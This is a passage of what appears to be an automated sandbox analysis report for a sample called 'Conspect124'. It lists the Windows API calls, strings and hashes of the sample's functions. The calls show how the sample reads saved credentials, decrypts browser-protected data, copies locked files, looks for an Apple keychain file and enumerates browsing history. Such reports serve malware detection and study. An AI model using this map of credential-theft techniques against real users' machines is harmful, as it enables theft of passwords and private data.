409d1f call 409b98 199->220 202->44 203->182 221 445ab2-445b03 memset call 40b2cc call 409d1f call 445389 203->221 207->208 248 445798-4457ca call 40b2cc call 409d1f call 409b98 207->248 208->10 220->82 254 445f9b 220->254 221->182 239->199 245 445e83-445ef5 memset call 40b2cc call 409d1f call 40ae18 239->245 240->239 265 445f4d-445f5a call 40ae51 245->265 248->208 264 4457cc-4457e5 call 4087b3 248->264 249->53 254->176 264->208 269 445ef7-445f04 call 40add4 265->269 270 445f5c-445f62 call 40aebe 265->270 269->265 274 445f06-445f38 call 40b2cc call 409d1f call 409b98 269->274 270->220 274->265 281 445f3a-445f48 call 445093 274->281 281->265
                                      APIs
                                      • memset.MSVCRT ref: 004455C2
                                      • wcsrchr.MSVCRT ref: 004455DA
                                      • memset.MSVCRT ref: 0044570D
                                      • memset.MSVCRT ref: 00445725
                                        • Part of subcall function 0040C768: _wcslwr.MSVCRT ref: 0040C817
                                        • Part of subcall function 0040C768: wcslen.MSVCRT ref: 0040C82C
                                        • Part of subcall function 0040BDB0: CredEnumerateW.ADVAPI32(00000000,00000000,?,?,?,00000000,?), ref: 0040BDE9
                                        • Part of subcall function 0040BDB0: wcslen.MSVCRT ref: 0040BE06
                                        • Part of subcall function 0040BDB0: wcsncmp.MSVCRT ref: 0040BE38
                                        • Part of subcall function 0040BDB0: memset.MSVCRT ref: 0040BE91
                                        • Part of subcall function 0040BDB0: memcpy.MSVCRT(?,?,?,00000001,?,?,?,00000000,?), ref: 0040BEB2
                                        • Part of subcall function 004135F7: GetProcAddress.KERNEL32(?,00000000), ref: 0041362A
                                      • memset.MSVCRT ref: 0044573D
                                      • memset.MSVCRT ref: 00445755
                                      • memset.MSVCRT ref: 004458CB
                                      • memset.MSVCRT ref: 004458E3
                                      • memset.MSVCRT ref: 0044596E
                                      • memset.MSVCRT ref: 00445A10
                                      • memset.MSVCRT ref: 00445A28
                                      • memset.MSVCRT ref: 00445AC6
                                        • Part of subcall function 00414C2E: SHGetSpecialFolderPathW.SHELL32(00000000,?,0000001A,00000000,?,00000000), ref: 00414C68
                                        • Part of subcall function 00445093: GetFileSize.KERNEL32(00000000,00000000,?,00000000,00000104,00445E7E,?,?,?,?,00000104), ref: 004450AA
                                        • Part of subcall function 00445093: ??2@YAPAXI@Z.MSVCRT(0000000A,?,?,00000104), ref: 004450BE
                                        • Part of subcall function 00445093: memset.MSVCRT ref: 004450CD
                                        • Part of subcall function 00445093: ??3@YAXPAX@Z.MSVCRT(00000000,?,?,?,?,?,?,?,?,00000104), ref: 004450F0
                                        • Part of subcall function 00445093: CloseHandle.KERNEL32(00000000,?,?,00000104), ref: 004450F7
                                      • memset.MSVCRT ref: 00445B52
                                      • memset.MSVCRT ref: 00445B6A
                                      • memset.MSVCRT ref: 00445C9B
                                      • memset.MSVCRT ref: 00445CB3
                                      • _wcsicmp.MSVCRT ref: 00445D56
                                      • memset.MSVCRT ref: 00445B82
                                        • Part of subcall function 0040B6EF: memset.MSVCRT ref: 0040B71C
                                        • Part of subcall function 0040B6EF: wcsrchr.MSVCRT ref: 0040B738
                                        • Part of subcall function 0040B6EF: memset.MSVCRT ref: 0040B756
                                        • Part of subcall function 0040B6EF: memset.MSVCRT ref: 0040B7F5
                                        • Part of subcall function 0040B6EF: CreateFileW.KERNELBASE(00445FAE,80000000,00000000,00000000,00000003,00000000,00000000,?,?), ref: 0040B80C
                                        • Part of subcall function 0040ADD4: wcscmp.MSVCRT ref: 0040ADF3
                                        • Part of subcall function 0040ADD4: wcscmp.MSVCRT ref: 0040AE04
                                      • memset.MSVCRT ref: 00445986
                                        • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                        • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                        • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                        • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                        • Part of subcall function 00409B98: GetFileAttributesW.KERNELBASE(?,0040DAEA,?,0040DBA1,00000000,?,00000000,00000208,?), ref: 00409B9C
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000B.00000002.3215263179.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 0000000B.00000002.3215263179.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                      • Associated: 0000000B.00000002.3215263179.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                      • Associated: 0000000B.00000002.3215263179.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_11_2_400000_Conspect124.jbxd
                                      Similarity
                                      • API ID: memset$wcslen$File$wcscmpwcsrchr$??2@??3@AddressAttributesCloseCreateCredEnumerateFolderHandlePathProcSizeSpecial_wcsicmp_wcslwrmemcpywcscatwcscpywcsncmp
                                      • String ID: *.*$Apple Computer\Preferences\keychain.plist
                                      • API String ID: 1963886904-3798722523
                                      • Opcode ID: 4107367e6a52814d16d978fdb1f2ed27fa2de906a3c2bdd9af1925875ae5045e
                                      • Instruction ID: 0d822d17a5609fa1e1b699618fc72e24fb48bc28b5d87ede4d5502c71e25afa2
                                      • Opcode Fuzzy Hash: 4107367e6a52814d16d978fdb1f2ed27fa2de906a3c2bdd9af1925875ae5045e
                                      • Instruction Fuzzy Hash: ED4278B29005196BEB10E761DD46EDFB37CEF45358F1001ABF508A2193EB385E948B9A

                                      Control-flow Graph

                                      APIs
                                        • Part of subcall function 004044A4: LoadLibraryW.KERNEL32(comctl32.dll,00000000,?,00000002,?,?,?,00412785,00000000,?,00000002,?,0044688C,00000000,?,0000000A), ref: 004044C3
                                        • Part of subcall function 004044A4: GetProcAddress.KERNEL32(00000000,InitCommonControlsEx), ref: 004044D5
                                        • Part of subcall function 004044A4: FreeLibrary.KERNEL32(00000000,?,00000002,?,?,?,00412785,00000000,?,00000002,?,0044688C,00000000,?,0000000A), ref: 004044E9
                                        • Part of subcall function 004044A4: MessageBoxW.USER32(00000001,Error: Cannot load the common control classes.,Error,00000030), ref: 00404514
                                      • SetErrorMode.KERNELBASE(00008001,00000000,?,00000002,?,0044688C,00000000,?,0000000A), ref: 00412799
                                      • GetModuleHandleW.KERNEL32(00000000,0041493C,00000000,?,00000002,?,0044688C,00000000,?,0000000A), ref: 004127B2
                                      • EnumResourceTypesW.KERNEL32(00000000,?,00000002), ref: 004127B9
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000B.00000002.3215263179.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 0000000B.00000002.3215263179.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                      • Associated: 0000000B.00000002.3215263179.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                      • Associated: 0000000B.00000002.3215263179.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_11_2_400000_Conspect124.jbxd
                                      Similarity
                                      • API ID: Library$AddressEnumErrorFreeHandleLoadMessageModeModuleProcResourceTypes
                                      • String ID: $/deleteregkey$/savelangfile
                                      • API String ID: 2744995895-28296030
                                      • Opcode ID: fcad638c039a134244896b453c320ca2d1027186d3b9ab8085e6916e84848b7d
                                      • Instruction ID: bb1d383b9f388563dc7403a66819e695bb2bbb53a4e653fbe84b6d7681309d95
                                      • Opcode Fuzzy Hash: fcad638c039a134244896b453c320ca2d1027186d3b9ab8085e6916e84848b7d
                                      • Instruction Fuzzy Hash: FC51BEB1608346ABD710AFA6DD88A9F77ECFF81304F40092EF644D2161D778E8558B2A

                                      Control-flow Graph

                                      APIs
                                      • memset.MSVCRT ref: 0040B71C
                                        • Part of subcall function 00409C70: wcscpy.MSVCRT ref: 00409C75
                                        • Part of subcall function 00409C70: wcsrchr.MSVCRT ref: 00409C7D
                                      • wcsrchr.MSVCRT ref: 0040B738
                                      • memset.MSVCRT ref: 0040B756
                                      • memset.MSVCRT ref: 0040B7F5
                                      • CreateFileW.KERNELBASE(00445FAE,80000000,00000000,00000000,00000003,00000000,00000000,?,?), ref: 0040B80C
                                      • CopyFileW.KERNEL32(00445FAE,?,00000000,?,?), ref: 0040B82D
                                      • CloseHandle.KERNELBASE(00000000,?,?), ref: 0040B838
                                      • memset.MSVCRT ref: 0040B851
                                      • memset.MSVCRT ref: 0040B8CA
                                      • memcmp.MSVCRT(?,v10,00000003), ref: 0040B9BF
                                        • Part of subcall function 00404423: GetProcAddress.KERNEL32(?,00000000), ref: 00404453
                                        • Part of subcall function 00404423: FreeLibrary.KERNEL32(00000000,00000141,?,00000000,?,004026E9,?,?,00000000,?), ref: 00404476
                                        • Part of subcall function 00404423: CryptUnprotectData.CRYPT32(?,00000000,?,00000000,00000000,?,?,?,00000000,?,004026E9,?,?,00000000,?), ref: 00404498
                                      • DeleteFileW.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 0040BAE5
                                      • memset.MSVCRT ref: 0040BB53
                                      • memcpy.MSVCRT(?,00000000,?,00000000,00000000,?), ref: 0040BB66
                                      • LocalFree.KERNEL32(00000000,?,?,?,00000000,00000000,?), ref: 0040BB8D
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000B.00000002.3215263179.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 0000000B.00000002.3215263179.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                      • Associated: 0000000B.00000002.3215263179.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                      • Associated: 0000000B.00000002.3215263179.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_11_2_400000_Conspect124.jbxd
                                      Similarity
                                      • API ID: memset$File$Freewcsrchr$AddressCloseCopyCreateCryptDataDeleteHandleLibraryLocalProcUnprotectmemcmpmemcpywcscpy
                                      • String ID: chp$v10
                                      • API String ID: 1297422669-2783969131
                                      • Opcode ID: 544f7529f0c4d3a53e9c457f8d9cabf322a2e4b31897d0a2c4cc607292de5a12
                                      • Instruction ID: 8b5aa87907ec6e815121f1c024adfc7170cbdef62e19f7af032d1a0a82a34a86
                                      • Opcode Fuzzy Hash: 544f7529f0c4d3a53e9c457f8d9cabf322a2e4b31897d0a2c4cc607292de5a12
                                      • Instruction Fuzzy Hash: 32D17372900218AFEB11EB95DC41EEE77B8EF44304F1044BAF509B7191DB789F858B99

                                      Control-flow Graph

                                      control_flow_graph 504 4091b8-40921b memset call 40a6e6 call 444432 509 409520-409526 504->509 510 409221-40923b call 40b273 call 438552 504->510 514 409240-409248 510->514 515 409383-4093ab call 40b273 call 438552 514->515 516 40924e-409258 call 4251c4 514->516 528 4093b1 515->528 529 4094ff-40950b call 443d90 515->529 521 40937b-40937e call 424f26 516->521 522 40925e-409291 call 4253cf * 2 call 4253af * 2 516->522 521->515 522->521 552 409297-409299 522->552 532 4093d3-4093dd call 4251c4 528->532 529->509 538 40950d-409511 529->538 539 4093b3-4093cc call 4253cf * 2 532->539 540 4093df 532->540 538->509 542 409513-40951d call 408f2f 538->542 539->532 555 4093ce-4093d1 539->555 544 4094f7-4094fa call 424f26 540->544 542->509 544->529 552->521 554 40929f-4092a3 552->554 554->521 556 4092a9-4092ba 554->556 555->532 559 4093e4-4093fb call 4253af * 2 555->559 557 4092bc 556->557 558 4092be-4092e3 memcpy memcmp 556->558 557->558 560 409333-409345 memcmp 558->560 561 4092e5-4092ec 558->561 559->544 569 409401-409403 559->569 560->521 564 409347-40935f memcpy 560->564 561->521 563 4092f2-409331 memcpy * 2 561->563 566 409363-409378 memcpy 563->566 564->566 566->521 569->544 570 409409-40941b memcmp 569->570 570->544 571 409421-409433 memcmp 570->571 572 4094a4-4094b6 memcmp 571->572 573 409435-40943c 571->573 572->544 575 4094b8-4094ed memcpy * 2 572->575 573->544 574 409442-4094a2 memcpy * 3 573->574 576 4094f4 574->576 575->576 576->544
                                      APIs
                                      • memset.MSVCRT ref: 004091E2
                                        • Part of subcall function 0040A6E6: WideCharToMultiByte.KERNEL32(0000FDE9,00000000,000003FF,000000FF,00000000,000003FF,00000000,00000000,0040B866,00445FAE,?,?,?,?,?,?), ref: 0040A6FF
                                      • memcpy.MSVCRT(?,00000000,?,?,?,?,?,?,?,?,?,?,00000143,00000000), ref: 004092C9
                                      • memcmp.MSVCRT(00000000,0045A4F0,00000006,?,?,?,?,?,?,?,?,?,?,?,?,00000143), ref: 004092D9
                                      • memcpy.MSVCRT(?,00000023,?), ref: 0040930C
                                      • memcpy.MSVCRT(?,?,00000010), ref: 00409325
                                      • memcmp.MSVCRT(00000000,0045A4E8,00000006), ref: 0040933B
                                      • memcpy.MSVCRT(?,00000015,?), ref: 00409357
                                      • memcpy.MSVCRT(?,?,00000010), ref: 00409370
                                      • memcmp.MSVCRT(00000000,004599B8,00000010), ref: 00409411
                                      • memcmp.MSVCRT(00000000,0045A500,00000006), ref: 00409429
                                      • memcpy.MSVCRT(?,00000023,?), ref: 00409462
                                      • memcpy.MSVCRT(?,?,00000010), ref: 0040947E
                                      • memcpy.MSVCRT(?,?,00000020), ref: 0040949A
                                      • memcmp.MSVCRT(00000000,0045A4F8,00000006), ref: 004094AC
                                      • memcpy.MSVCRT(?,00000015,?), ref: 004094D0
                                      • memcpy.MSVCRT(?,?,00000020), ref: 004094E8
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000B.00000002.3215263179.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                       • Associated: 0000000B.00000002.3215263179.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                       • Associated: 0000000B.00000002.3215263179.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                       • Associated: 0000000B.00000002.3215263179.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_11_2_400000_Conspect124.jbxd
                                      Similarity
                                      • API ID: memcpy$memcmp$ByteCharMultiWidememset
                                      • String ID:
                                      • API String ID: 3715365532-3916222277
                                      • Opcode ID: 1c524b1582e21d5cf33c38ae172dfd569e4d92201c70e2bcc6981c46efb40b80
                                      • Instruction ID: d5c0d9b4f94ac501fd0f2fb5594fd033b2d13f4c98b4255323c8c53c7695c3f7
                                      • Opcode Fuzzy Hash: 1c524b1582e21d5cf33c38ae172dfd569e4d92201c70e2bcc6981c46efb40b80
                                      • Instruction Fuzzy Hash: DDA1BA71900605ABDB21EF65D885BAFB7BCAF44304F01043FF945E6282EB78EA458B59

                                      Control-flow Graph

                                      APIs
                                        • Part of subcall function 0040DD85: memset.MSVCRT ref: 0040DDAD
                                        • Part of subcall function 0040DD85: CreateFileW.KERNELBASE(?,80000000,00000003,00000000,00000003,00000000,00000000,?,000000FF,00000000,00000104), ref: 0040DDD4
                                        • Part of subcall function 0040DD85: NtQuerySystemInformation.NTDLL(00000010,00000104,00001000,00000000,?,000000FF,00000000,00000104), ref: 0040DE15
                                        • Part of subcall function 0040DD85: CloseHandle.KERNELBASE(C0000004,?,000000FF,00000000,00000104), ref: 0040DE3E
                                        • Part of subcall function 0040DD85: GetCurrentProcessId.KERNEL32(?,000000FF,00000000,00000104), ref: 0040DE49
                                        • Part of subcall function 0040DD85: _wcsicmp.MSVCRT ref: 0040DEB2
                                        • Part of subcall function 0040AFCF: ??2@YAPAXI@Z.MSVCRT(00000000,00000000,0040B608), ref: 0040AFD8
                                      • OpenProcess.KERNEL32(00000040,00000000,00000000,00000104,?,00000000,00000104,?,00000000,00000104,00000000), ref: 0040E093
                                      • GetCurrentProcess.KERNEL32(?,80000000,00000000,00000000), ref: 0040E0B2
                                      • DuplicateHandle.KERNELBASE(?,00000104,00000000), ref: 0040E0BF
                                      • GetFileSize.KERNEL32(?,00000000), ref: 0040E0D4
                                        • Part of subcall function 00409A45: GetTempPathW.KERNEL32(00000104,?,00445FAE), ref: 00409A5C
                                        • Part of subcall function 00409A45: GetWindowsDirectoryW.KERNEL32(?,00000104), ref: 00409A6E
                                        • Part of subcall function 00409A45: GetTempFileNameW.KERNELBASE(?,0040B827,00000000,?), ref: 00409A85
                                        • Part of subcall function 004096DC: CreateFileW.KERNELBASE(00000000,40000000,00000001,00000000,00000002,00000000,00000000,0041052B,00000000,?,00412758,00000000,00000000,?,00000000,00000000), ref: 004096EE
                                      • CreateFileMappingW.KERNELBASE(?,00000000,00000002,00000000,00000000,00000000), ref: 0040E0FE
                                      • MapViewOfFile.KERNELBASE(00000000,00000004,00000000,00000000,00000104), ref: 0040E113
                                      • WriteFile.KERNELBASE(00000000,00000000,00000104,0040E6A3,00000000), ref: 0040E12E
                                      • UnmapViewOfFile.KERNEL32(00000000), ref: 0040E135
                                      • CloseHandle.KERNELBASE(?), ref: 0040E13E
                                      • CloseHandle.KERNEL32(00000000), ref: 0040E143
                                      • CloseHandle.KERNEL32(?), ref: 0040E148
                                      • CloseHandle.KERNEL32(?), ref: 0040E14D
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000B.00000002.3215263179.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                       • Associated: 0000000B.00000002.3215263179.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                       • Associated: 0000000B.00000002.3215263179.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                       • Associated: 0000000B.00000002.3215263179.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_11_2_400000_Conspect124.jbxd
                                      Similarity
                                      • API ID: File$Handle$Close$CreateProcess$CurrentTempView$??2@DirectoryDuplicateInformationMappingNameOpenPathQuerySizeSystemUnmapWindowsWrite_wcsicmpmemset
                                      • String ID: bhv
                                      • API String ID: 4234240956-2689659898
                                      • Opcode ID: d6173e2fc1e4a9acd8e6e5097b502ef7bad012bb9f4f5ce7a241332e90e3d993
                                      • Instruction ID: 69536691d8562172d0558c987aea6dfe4ed17d6a9a6de0cf2c6621a9a97a0e87
                                      • Opcode Fuzzy Hash: d6173e2fc1e4a9acd8e6e5097b502ef7bad012bb9f4f5ce7a241332e90e3d993
                                      • Instruction Fuzzy Hash: 15412775800218FBCF119FA6CC489DFBFB9FF09750F148466F504A6250D7748A50CBA8

                                      Control-flow Graph

                                      APIs
                                        • Part of subcall function 0040A804: memset.MSVCRT ref: 0040A824
                                        • Part of subcall function 0040A804: GetSystemDirectoryW.KERNEL32(C:\Windows\system32,00000104), ref: 0040A841
                                        • Part of subcall function 0040A804: wcscpy.MSVCRT ref: 0040A854
                                        • Part of subcall function 0040A804: wcscat.MSVCRT ref: 0040A86A
                                        • Part of subcall function 0040A804: LoadLibraryW.KERNELBASE(00000000), ref: 0040A87B
                                        • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(?), ref: 0040A884
                                      • GetProcAddress.KERNEL32(00000000,psapi.dll), ref: 00413F6F
                                      • GetProcAddress.KERNEL32(?,EnumProcessModules), ref: 00413F7B
                                      • GetProcAddress.KERNEL32(?,GetModuleFileNameExW), ref: 00413F87
                                      • GetProcAddress.KERNEL32(?,EnumProcesses), ref: 00413F93
                                      • GetProcAddress.KERNEL32(?,GetModuleInformation), ref: 00413F9F
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000B.00000002.3215263179.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                       • Associated: 0000000B.00000002.3215263179.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                       • Associated: 0000000B.00000002.3215263179.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                       • Associated: 0000000B.00000002.3215263179.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_11_2_400000_Conspect124.jbxd
                                      Similarity
                                      • API ID: AddressProc$LibraryLoad$DirectorySystemmemsetwcscatwcscpy
                                      • String ID: EnumProcessModules$EnumProcesses$GetModuleBaseNameW$GetModuleFileNameExW$GetModuleInformation$psapi.dll
                                      • API String ID: 2941347001-70141382
                                      • Opcode ID: 39c22376907c33733211e363db3c4349312dc982ad78c4cc463d34b505bb12c7
                                      • Instruction ID: 7b3d606b7d389a8205b465373562f67d85acf78e859b2fe1c5436fc88fb80995
                                      • Opcode Fuzzy Hash: 39c22376907c33733211e363db3c4349312dc982ad78c4cc463d34b505bb12c7
                                      • Instruction Fuzzy Hash: BBF03470840340AECB706F769809E06BEF0EFD8B097318C2EE6C557291E3BD9098DE48

                                      Control-flow Graph

                                      APIs
                                      • memset.MSVCRT ref: 0040C298
                                        • Part of subcall function 00414C2E: SHGetSpecialFolderPathW.SHELL32(00000000,?,0000001A,00000000,?,00000000), ref: 00414C68
                                        • Part of subcall function 0040E5ED: memset.MSVCRT ref: 0040E60F
                                        • Part of subcall function 0040E5ED: memset.MSVCRT ref: 0040E629
                                        • Part of subcall function 0040AFCF: ??2@YAPAXI@Z.MSVCRT(00000000,00000000,0040B608), ref: 0040AFD8
                                      • FindFirstUrlCacheEntryW.WININET(visited:,?,80000001), ref: 0040C30D
                                      • wcschr.MSVCRT ref: 0040C324
                                      • wcschr.MSVCRT ref: 0040C344
                                      • FindNextUrlCacheEntryW.WININET(?,?,80000001), ref: 0040C369
                                      • GetLastError.KERNEL32 ref: 0040C373
                                      • FindNextUrlCacheEntryW.WININET(?,?,80000001), ref: 0040C39F
                                      • FindCloseUrlCache.WININET(?), ref: 0040C3B0
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000B.00000002.3215263179.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                       • Associated: 0000000B.00000002.3215263179.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                       • Associated: 0000000B.00000002.3215263179.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                       • Associated: 0000000B.00000002.3215263179.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_11_2_400000_Conspect124.jbxd
                                      Similarity
                                      • API ID: CacheFind$Entrymemset$Nextwcschr$??2@CloseErrorFirstFolderLastPathSpecial
                                      • String ID: visited:
                                      • API String ID: 2470578098-1702587658
                                      • Opcode ID: 93c9a51482be428e2f8f42027b6bca19130ab09787b58ace62cc7f2a9cf54466
                                      • Instruction ID: 6629d855392f08d41decd2a192e4b6579142cf3eaa95f33c860a05aa0b18639b
                                      • Opcode Fuzzy Hash: 93c9a51482be428e2f8f42027b6bca19130ab09787b58ace62cc7f2a9cf54466
                                      • Instruction Fuzzy Hash: DA417F71D00219ABDB10EF92DC85AEFBBB8FF45714F10416AE904F7281D7389A45CBA9

                                      Control-flow Graph

                                      APIs
                                        • Part of subcall function 00406B90: _wcsicmp.MSVCRT ref: 00406BC1
                                      • memset.MSVCRT ref: 0040E1BD
                                        • Part of subcall function 00406E8F: memset.MSVCRT ref: 00406F8B
                                      • free.MSVCRT ref: 0040E28B
                                        • Part of subcall function 0040DD50: _wcsicmp.MSVCRT ref: 0040DD69
                                        • Part of subcall function 0040AAE3: wcslen.MSVCRT ref: 0040AAF2
                                        • Part of subcall function 0040AAE3: _memicmp.MSVCRT ref: 0040AB20
                                      • _snwprintf.MSVCRT ref: 0040E257
                                        • Part of subcall function 0040A8D0: wcslen.MSVCRT ref: 0040A8E2
                                        • Part of subcall function 0040A8D0: free.MSVCRT ref: 0040A908
                                        • Part of subcall function 0040A8D0: free.MSVCRT ref: 0040A92B
                                        • Part of subcall function 0040A8D0: memcpy.MSVCRT(?,?,000000FF,00000001,?,00000000,?,?,0040AD76,?,000000FF), ref: 0040A94F
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000B.00000002.3215263179.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                       • Associated: 0000000B.00000002.3215263179.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                       • Associated: 0000000B.00000002.3215263179.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                       • Associated: 0000000B.00000002.3215263179.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_11_2_400000_Conspect124.jbxd
                                      Similarity
                                      • API ID: free$_wcsicmpmemsetwcslen$_memicmp_snwprintfmemcpy
                                      • String ID: $ContainerId$Container_%I64d$Containers$Name
                                      • API String ID: 2804212203-2982631422
                                      • Opcode ID: 7a95fccbd23525aa76b2e079fc64e0475dfff11d865135f876cd6a5397388c2b
                                      • Instruction ID: de93d03617a61f3aa6bbe184beafcfad76b4f566d35596b706efacabd7485ccb
                                      • Opcode Fuzzy Hash: 7a95fccbd23525aa76b2e079fc64e0475dfff11d865135f876cd6a5397388c2b
                                      • Instruction Fuzzy Hash: 74318272D002196ADF10EFA6DC45ADEB7B8AF04344F1105BFE508B3191DB38AE598F99

                                      Control-flow Graph

                                      APIs
                                        • Part of subcall function 0040CC26: GetFileSize.KERNEL32(00000000,00000000,000003FF,?,00000000,0040B7D4,?,?,?,?,000003FF,?,?,?,00445FAE,?), ref: 0040CC44
                                        • Part of subcall function 0040CC26: CloseHandle.KERNELBASE(?,?,000000FF,0000FDE9), ref: 0040CC98
                                        • Part of subcall function 0040CCF0: _wcsicmp.MSVCRT ref: 0040CD2A
                                      • memset.MSVCRT ref: 0040BC75
                                      • memset.MSVCRT ref: 0040BC8C
                                      • WideCharToMultiByte.KERNEL32(00000000,00000000,Function_0004E518,000000FF,?,00000FFF,00000000,00000000,?,?,?,0040B7D4,?,?), ref: 0040BCA8
                                      • memcmp.MSVCRT(?,00000000,00000005,?,?,?,0040B7D4,?,?,?,?,000003FF,?,?,?,00445FAE), ref: 0040BCD6
                                      • memcpy.MSVCRT(00000024,?,00000020,?,00000000,00000000,?,?,?,?,?,?,?,0040B7D4), ref: 0040BD2B
                                      • LocalFree.KERNEL32(?,?,00000000,00000000,?,?,?,?,?,?,?,0040B7D4), ref: 0040BD3D
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000B.00000002.3215263179.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                       • Associated: 0000000B.00000002.3215263179.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                       • Associated: 0000000B.00000002.3215263179.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                       • Associated: 0000000B.00000002.3215263179.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_11_2_400000_Conspect124.jbxd
                                      Similarity
                                      • API ID: memset$ByteCharCloseFileFreeHandleLocalMultiSizeWide_wcsicmpmemcmpmemcpy
                                      • String ID:
                                      • API String ID: 115830560-3916222277
                                      • Opcode ID: 4ebf604db45489440b0c8485e844b7deffc41ff7e568ae10611abfa3d316197e
                                      • Instruction ID: 00a8249a540342db609c93f8c1f67c79963b4134db5221072d0e6ece1bb2d715
                                      • Opcode Fuzzy Hash: 4ebf604db45489440b0c8485e844b7deffc41ff7e568ae10611abfa3d316197e
                                      • Instruction Fuzzy Hash: 3F41B372900219ABDB10ABA5CC85ADEB7ACEF04314F01057BB509F7292D7789E45CA99

                                      Control-flow Graph

                                      APIs
                                      • CreateFileW.KERNELBASE(?,-7FBE829D,00000003,00000000,?,?,00000000), ref: 00418457
                                      • CreateFileA.KERNEL32(?,-7FBE829D,00000003,00000000,|A,00417CE3,00000000), ref: 0041846F
                                      • GetLastError.KERNEL32 ref: 0041847E
                                      • free.MSVCRT ref: 0041848B
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000B.00000002.3215263179.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                       • Associated: 0000000B.00000002.3215263179.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                       • Associated: 0000000B.00000002.3215263179.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                       • Associated: 0000000B.00000002.3215263179.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_11_2_400000_Conspect124.jbxd
                                      Similarity
                                      • API ID: CreateFile$ErrorLastfree
                                      • String ID: |A
                                      • API String ID: 77810686-1717621600
                                      • Opcode ID: b9220c8ee9235e77546fc7e578fe859ac5c7910c95b4d012992e052ab282d142
                                      • Instruction ID: 73005d91fce95ddd83c4435d1527c7398ec28b7193468e33704956b81d718a95
                                      • Opcode Fuzzy Hash: b9220c8ee9235e77546fc7e578fe859ac5c7910c95b4d012992e052ab282d142
                                      • Instruction Fuzzy Hash: 50412472508306AFD710CF25DC4179BBBE5FF84328F14492EF8A492290EB78D9448B96

                                      Control-flow Graph

                                      APIs
                                      • memset.MSVCRT ref: 0041249C
                                      • ??2@YAPAXI@Z.MSVCRT(00002A88), ref: 004124D2
                                      • ??2@YAPAXI@Z.MSVCRT(00000350), ref: 00412510
                                      • GetModuleHandleW.KERNEL32(00000000,0000000E), ref: 00412582
                                      • LoadIconW.USER32(00000000,00000065), ref: 0041258B
                                      • wcscpy.MSVCRT ref: 004125A0
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000B.00000002.3215263179.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                       • Associated: 0000000B.00000002.3215263179.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                       • Associated: 0000000B.00000002.3215263179.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                       • Associated: 0000000B.00000002.3215263179.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                      Joe Sandbox IDA Plugin
